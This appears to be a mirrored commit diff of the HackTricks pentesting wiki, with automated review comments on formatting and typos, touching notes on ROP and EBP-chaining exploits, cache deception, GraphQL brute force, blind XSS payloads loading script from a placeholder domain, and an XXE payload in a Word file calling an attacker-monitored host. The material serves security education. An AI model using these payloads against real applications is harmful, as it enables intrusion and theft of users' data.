mirror of
https://github.com/carlospolop/hacktricks
synced 2025-02-16 14:08:26 +00:00
GitBook: [master] 10 pages and 4 assets modified
This commit is contained in:
parent
b38608ac6c
commit
53db995b86
13 changed files with 99 additions and 59 deletions
BIN
.gitbook/assets/image (621) (1) (1).png
Normal file
@ -59,8 +59,6 @@ Para obtener la dirección de una función dentro de un programa se puede hacer:
objdump -d ./PROGRAMA | grep FUNCION
```



## ROP

### Call to sys\_execve

@ -124,7 +122,6 @@ call -0x24 ; Salto a la primera instru

**EJ usando el Stack\(/bin/sh\):**


```text
section .text
global _start

@ -250,8 +247,9 @@ De esta forma se pueden encadenar funciones a las que llamar. Además, si se qui
Consiste en aprovechar el poder manipular el EBP para ir encadenando la ejecución de varias funciones a través del EBP y de "leave;ret"

RELLENO
+ Situamos en el EBP un EBP falso que apunta a: 2º EBP\_falso + la función a ejecutar: \(&system\(\) + &leave;ret + &“/bin/sh”\)
+ En el EIP ponemos de dirección una función &\(leave;ret\)

* Situamos en el EBP un EBP falso que apunta a: 2º EBP\_falso + la función a ejecutar: \(&system\(\) + &leave;ret + &“/bin/sh”\)
* En el EIP ponemos de dirección una función &\(leave;ret\)

Iniciamos la shellcode con la dirección a la siguiente parte de la shellcode, por ej: 2ºEBP\_falso + &system\(\) + &\(leave;ret;\) + &”/bin/sh”

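Review bot: The list marker on the two "Situamos"/"En el EIP" bullets changes from `+ ` to `* `, which matches the `*` lists used elsewhere in this file; no other change. The standalone word `RELLENO` just above the list is still a bare line rather than a heading or list item, so it renders as a one-word paragraph; consider making it the first bullet of the same list so the three pieces of the layout read as one sequence.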
@ -273,7 +271,9 @@ El exploit quedaría: SHELLCODE + Relleno \(hasta EIP\) + **&ret** \(los siguien

Al parecer funciones como **strncpy** una vez completas eliminan de la pila la dirección donde estaba guardada la shellcode imposibilitando esta técnica. Es decir, la dirección que pasan a la función como argumento \(la que guarda la shellcode\) es modificada por un 0x00 por lo que al llamar al segundo **ret** se encuentra con un 0x00 y el programa muere.

```text
**Ret2PopRet**
```

Si no tenemos control sobre el primer argumento pero sí sobre el segundo o el tercero, podemos sobreescribir EIP con una dirección a pop-ret o pop-pop-ret, según la que necesitemos.

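Review bot: The two added lines wrap `**Ret2PopRet**` in a ```text fence, which prints the asterisks literally inside a code block instead of rendering a bold section title; this looks like an export artifact rather than an intended change. Keep `**Ret2PopRet**` outside any fence, or better, make it a `### Ret2PopRet` heading to match the other technique headings in this file.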
@ -653,7 +653,7 @@ So what's the **bypass**? The typical bypass I use is to just don't write to mem
Note that in order for this to happen the binary needs to know previous to execution the addresses to the functions:

* Lazy binding: The address of a function is searched the first time the function is called. So, the GOT needs to have write permissions during execution.
* Bind now: The addresses of the functions are solved at the begginig of the execution, then read-only permissions are given to sensitive sections like .got, .dtors, .ctors, .dynamic, .jcr. ``**`-z relro`** `y` **`-z now`**
* Bind now: The addresses of the functions are solved at the begginig of the execution, then read-only permissions are given to sensitive sections like .got, .dtors, .ctors, .dynamic, .jcr. ```**``-z relro`**`y`**`-z now\`\*\*

To check if a program uses Bind now you can do:

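Review bot: The replacement "Bind now" line makes the flag markup worse, not better: ```**``-z relro`**`y`**`-z now\`\*\* opens a triple-backtick fence in the middle of a sentence and escapes the closing bold markers, so neither flag renders as inline code. Plain `-z relro` and `-z now` in single backticks is enough. While this line is being touched: "begginig" should be "beginning", and the Spanish "y" between the two flags should be "and" in this English section.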
@ -663,8 +663,6 @@ readelf -l /proc/ID_PROC/exe | grep BIND_NOW

\*\*\*\*



Cuando el binario es cargado en memoria y una función es llamada por primera vez se salta a la PLT \(Procedure Linkage Table\), de aquí se realiza un salto \(jmp\) a la GOT y descubre que esa entrada no ha sido resuelta \(contiene una dirección siguiente de la PLT\). Por lo que invoca al Runtime Linker o rtfd para que resuelva la dirección y la guarde en la GOT.

Cuando se llama a una función se llama a la PLT, esta tiene la dirección de la GOT donde se almacena la dirección de la función, por lo que redirige el flujo allí y así se llama a la función. Sin embargo, si es la primera vez que se llama a la función, lo que hay en la GOT es la siguiente instrucción de la PLT, por lo tanto el flujo sigue el código de la PLT \(rtfd\) y averigua la dirección de la función, la guarda en la GOT y la llama.

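Review bot: Dropping the stray `\*\*\*\*` line is right. In the two Spanish paragraphs that follow, the runtime linker is called "rtfd" twice ("Runtime Linker o rtfd" and "el código de la PLT \(rtfd\)"); the dynamic linker is `rtld` (ld.so), so both occurrences should read "rtld" while this section is being edited.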
@ -60,7 +60,7 @@ def connect_binary():
def send_payload(payload):
payload = PREFIX_PAYLOAD + payload + SUFFIX_PAYLOAD
log.info("payload = %s" % repr(payload))
if len(payload) > MAX_LENTGH: print("!!!!!!!!! ERROR, MAX LENGTH EXCEEDED. To mae it shorter consider changing the <num>c% for <num/4>x%")
if len(payload) > MAX_LENTGH: print("!!!!!!!!! ERROR, MAX LENGTH EXCEEDED")
P.sendline(payload)
sleep(0.5)
return P.recv()

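Review bot: The length check on the `if len(payload) > MAX_LENTGH:` line still only prints and then falls through to `P.sendline(payload)`, so an oversized payload is sent anyway and the error is easy to miss in the output; after the message, `return None` or `raise ValueError("payload exceeds MAX_LENTGH")` so the caller cannot proceed with bad input. `MAX_LENTGH` is also misspelled (`MAX_LENGTH`), but renaming it means changing its definition as well, which is outside this hunk.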
@ -154,7 +154,7 @@ If you want to **know** about my **latest modifications**/**additions** or you h
If you want to **share some tricks with the community** you can also submit **pull requests** to ****[**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) ****that will be reflected in this book.
Don't forget to **give ⭐ on the github** to motivate me to continue developing this book.

![](../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%284%29%20%285%29.png)
![](../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%284%29%20%286%29.png)

[**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)\*\*\*\*

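Review bot: The only change here is the asset suffix `(5)` → `(6)` in the coffee image path. The unchanged context still carries export debris that renders as literal asterisks: the empty `****` pairs around the GitHub link on the "If you want to share..." line and the trailing `\*\*\*\*` after `[**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)`; both can be dropped in the same pass. The same footer, with the same debris, appears again in the last hunk of this commit.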
@ -18,7 +18,7 @@ If you want to **share some tricks with the community** you can also submit **pu

## 0- Physical Attacks

Do you have **physical access** to the machine that you want to attack? You should read some [**tricks about physical attacks**](physical-attacks/physical-attacks.md) and others about ****[**escaping from GUI applications**](physical-attacks/escaping-from-gui-applications/).
Do you have **physical access** to the machine that you want to attack? You should read some [**tricks about physical attacks**](physical-attacks/physical-attacks.md) and others about **\*\*\[**escaping from GUI applications\*\*\]\(physical-attacks/escaping-from-gui-applications/\).

## 1 - [Discovering hosts inside the network ](pentesting/pentesting-network/#discovering-hosts)/ [Discovering Assets of the company](external-recon-methodology/)

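Review bot: The replacement line breaks the second link: `**\*\*\[**escaping from GUI applications\*\*\]\(physical-attacks/escaping-from-gui-applications/\)` escapes the brackets and parentheses, so it renders as literal text instead of a link to `physical-attacks/escaping-from-gui-applications/`. Keep the original form `[**escaping from GUI applications**](physical-attacks/escaping-from-gui-applications/)` and just drop the empty `****` in front of it.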
@ -9,7 +9,7 @@

## Cache Poisoning

The goal of poisoning the cache is to make the clients load unexpected resources partially or totally controlled by the attacker.
The goal of poisoning the cache is to make the **clients load unexpected resources partially or totally controlled by the attacker**.
The poisoned response will only be served to users who visit the affected page while the cache is poisoned. As a result, the impact can range from non-existent to massive depending on whether the page is popular or not.

In order to perform a cache poisoning attack you need first to **identify ukeyed inputs** \(parameters not needed to appear on the the cached request but that change the returned page\), see **how to abuse** this parameter and **get the response cached**.

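Review bot: Bolding only in the goal sentence, which is fine. The unchanged paragraph below it has two typos worth fixing in the same commit: "identify ukeyed inputs" should be "identify unkeyed inputs", and "on the the cached request" should be "on the cached request".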
@ -91,9 +91,11 @@ Learn here about how to perform [Cache Poisoning attacks abusing HTTP Request Sm

## Cache Deception

The goal of Cache Deception is to make clients load resources that are going to be saved by the cache with their sensitive information.
A very clear example can be found in this write-up: [https://hackerone.com/reports/593712](https://hackerone.com/reports/593712).
The goal of Cache Deception is to make clients **load resources that are going to be saved by the cache with their sensitive information**.

First of all note that **extensions** such as `.css`, `.js`, `.png` etc are usually **configured** to be **saved** in the **cache.** Therefore, if you access w_ww.example.com/profile.php/nonexistent.js_ the cache will probably store the response because it sees the `.js` **extension**. But, if the **application** is **replaying** with the **sensitive** user contents stored in _www.example.com/profile.php_, you can **steal** those contents from other users.

Another very clear example can be found in this write-up: [https://hackerone.com/reports/593712](https://hackerone.com/reports/593712).
In the example it is explained that if you load a non-existent page like _http://www.example.com/home.php/non-existent.css_ the content of _http://www.example.com/home.php_ \(**with the users sensitive information**\) is going to be returned and the cache server is going to save the result.
Then, the **attacker** can access _http://www.example.com/home.php_ and see the **confidential information** of the users that accessed before.

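Review bot: In the new "First of all note..." paragraph the italic markers are misplaced: `w_ww.example.com/profile.php/nonexistent.js_` should be `_www.example.com/profile.php/nonexistent.js_`, and "the **application** is **replaying** with the **sensitive** user contents" should be "replying with". `in the **cache.**` also closes the bold after the period, so the period is bold; move it outside the markers.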
@ -837,6 +837,8 @@ There is **C2** dedicated to the **exploitation of Service Workers** called [**S

### Blind XSS payloads

You can also use: [https://xsshunter.com/](https://xsshunter.com/)

```markup
"><img src='//domain/xss'>
"><script src="//domain/xss.js"></script>

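Review bot: `You can also use: [https://xsshunter.com/](https://xsshunter.com/)` is the first line under the `### Blind XSS payloads` heading, so "also" has nothing to refer to; placing the sentence after the payload fence, or rewording it to "A hosted option is ...", reads better.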
@ -295,6 +295,47 @@ Testing 0 entities : []
Testing 0 entities : []
```

### XXE via Office Open XML Parsers

\(Copied from [**here**](https://labs.detectify.com/2021/09/30/10-types-web-vulnerabilities-often-missed/)\)
Many web applications allow you to upload Microsoft Office documents, and then they parse some details out of them. For example, you might have a web application that allows you to import data by uploading a spreadsheet in XLSX format. At some point, in order for the parser to extract the data from the Spreadsheet, the parser is going to need to **parse at least one XML file**.

The only way to test for this is to generate a **Microsoft Office file that contains an XXE payload**, so let’s do that. First, create an empty directory to unzip your document to, and unzip it!

```text
test$ ls
test.docx
test$ mkdir unzipped
test$ unzip ./test.docx -d ./unzipped/
Archive: ./test.docx
inflating: ./unzipped/word/numbering.xml
inflating: ./unzipped/word/settings.xml
inflating: ./unzipped/word/fontTable.xml
inflating: ./unzipped/word/styles.xml
inflating: ./unzipped/word/document.xml
inflating: ./unzipped/word/_rels/document.xml.rels
inflating: ./unzipped/_rels/.rels
inflating: ./unzipped/word/theme/theme1.xml
inflating: ./unzipped/[Content_Types].xml
```

Open up `./unzipped/word/document.xml` in your favourite text editor \(vim\) and edit the **XML to contain your favourite XXE payload**. The first thing I try tends to be a HTTP request, like this:

```text
<!DOCTYPE x [ <!ENTITY test SYSTEM "http://[ID].burpcollaborator.net/"> ]>
<x>&test;</x>
```

Those lines should be inserted in between the two root XML objects, like this, and of course you will need to replace the URL with a URL that you can monitor for requests:

![Those lines should be inserted in between the two root XML objects, like thi](https://labs.detectify.com/wp-content/uploads/2021/09/xxe-obscure.png)

All that is left is to **zip the file up to create your evil poc.docx file**. From the “unzipped” directory that we created earlier, run the following:

![From the "unzipped" directory that we created earlier, run the following:](https://labs.detectify.com/wp-content/uploads/2021/09/xxe-unzipped.png)

Now upload the file to your \(hopefully\) vulnerable web application and pray to the hacking gods for a request in your Burp Collaborator logs.

### Jar: protocol

The `jar` protocol is only available on **Java applications**. It allows to access files inside a **PKZIP** file \(`.zip`, `.jar`, ...\) and works for local and remote files:

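Review bot: Two of the steps in the copied section exist only as screenshots, the placement of the DOCTYPE (`![Those lines should be inserted in between the two root XML objects, like thi](...)`) and the re-zip command (`![From the "unzipped" directory that we created earlier, run the following:](...)`), so they can't be copied, searched or diffed and will break if the external image URLs go away; transcribe them as text in a fence. The phrase "in between the two root XML objects" is also imprecise, since an XML document has exactly one root element: the `<!DOCTYPE ...>` block belongs after the `<?xml ...?>` declaration and before that root element, and a second top-level `<x>&test;</x>` makes the file ill-formed XML, which stricter parsers will reject before any entity is resolved. Finally, the section is copied verbatim from the linked Detectify post; the attribution is present, but the first-person "I try" voice should be flagged as a quote or reworded to match the rest of the file.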
@ -16,7 +16,7 @@ When performing your directory brute force attacks make sure to add the followin
* _/graphql/console_

Once you find an open graphQL instance you need to know what queries it supports. This can be done by using the introspection system, more details can be found here: [**GraphQL: A query language for APIs.**
_It’s often useful to ask a GraphQL schema for information about what queries it supports. GraphQL allows us to do so…_graphql.org](https://graphql.org/learn/introspection/)
\_It’s often useful to ask a GraphQL schema for information about what queries it supports. GraphQL allows us to do so…\_graphql.org](https://graphql.org/learn/introspection/)

### Basic Enumeration

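Review bot: The link that starts with `[**GraphQL: A query language for APIs.**` on the "Once you find..." line is still split across two lines, and the new second line escapes the underscores (`\_It’s ... \_graphql.org](https://graphql.org/learn/introspection/)`), which turns the italic quote into literal underscores inside the link text; depending on the renderer the link itself may not survive the line break either. A single-line link such as `[GraphQL introspection](https://graphql.org/learn/introspection/)` would render reliably and says the same thing.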
@ -242,7 +242,6 @@ mutation {
}
}
}

```

### Batching brute-force in 1 API request

@ -254,8 +253,6 @@ Below you can find the simplest demonstration of an application authentication r

![](../../.gitbook/assets/image%20%28245%29.png)



As we can see from the response screenshot, the first and the third requests returned _null_ and reflected the corresponding information in the _error_ section. The **second mutation had the correct authentication** data and the response has the correct authentication session token.

![](../../.gitbook/assets/image%20%28119%29.png)

@ -294,23 +291,23 @@ For more information **check the** [**original post here**](https://blog.doyense

### Clients

{% embed url="https://github.com/graphql/graphiql" %}
{% embed url="https://github.com/graphql/graphiql" caption="" %}

{% embed url="https://github.com/swisskyrepo/GraphQLmap" %}
{% embed url="https://github.com/swisskyrepo/GraphQLmap" caption="" %}

{% embed url="https://altair.sirmuel.design/" %}
{% embed url="https://altair.sirmuel.design/" caption="" %}

{% embed url="https://blog.doyensec.com/2020/03/26/graphql-scanner.html" %}
{% embed url="https://blog.doyensec.com/2020/03/26/graphql-scanner.html" caption="" %}

{% embed url="https://github.com/doyensec/inql" %}
{% embed url="https://github.com/doyensec/inql" caption="" %}

{% embed url="https://altair.sirmuel.design/" %}
{% embed url="https://altair.sirmuel.design/" caption="" %}

{% embed url="https://gitlab.com/dee-see/graphql-path-enum" %}
{% embed url="https://gitlab.com/dee-see/graphql-path-enum" caption="" %}

### Automatic Tests

{% embed url="https://graphql-dashboard.herokuapp.com/" %}
{% embed url="https://graphql-dashboard.herokuapp.com/" caption="" %}

* Video explaining AutoGraphQL: [https://www.youtube.com/watch?v=JJmufWfVvyU](https://www.youtube.com/watch?v=JJmufWfVvyU)

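Review bot: `{% embed url="https://altair.sirmuel.design/" %}` is listed twice under `### Clients` (third and sixth entries), in both the old and new versions; drop one of them. The `caption=""` toggle on every embed is otherwise harmless, since an empty caption renders nothing, but flipping it in every file makes diffs noisy for no visible change.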
@ -402,7 +402,7 @@ If you don't execute this from a Domain Controller, ATA is going to catch you, s
* [Python script to enumerate active directory](https://github.com/ropnop/windapsearch)
* [Python script to enumerate active directory](https://github.com/CroweCybersecurity/ad-ldap-enum)

![](../../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%284%29%20%2812%29.png)
![](../../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%284%29%20%2813%29.png)

[**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)

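Review bot: The two adjacent `* [Python script to enumerate active directory](...)` lines carry the same label for two different tools (ropnop/windapsearch and CroweCybersecurity/ad-ldap-enum). If the intent is to replace one with the other, say so in the commit message; if both should stay in the list, the label should name the tool so readers can tell them apart. The footer image suffix change `(12)` → `(13)` in the same hunk is unrelated to the tool list.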
@ -126,7 +126,7 @@ If you want to **know** about my **latest modifications**/**additions** or you h
If you want to **share some tricks with the community** you can also submit **pull requests** to ****[**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) ****that will be reflected in this book.
Don't forget to **give ⭐ on the github** to motivate me to continue developing this book.

![](../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%284%29%20%284%29.png)
![](../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%284%29%20%285%29.png)

[**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)\*\*\*\*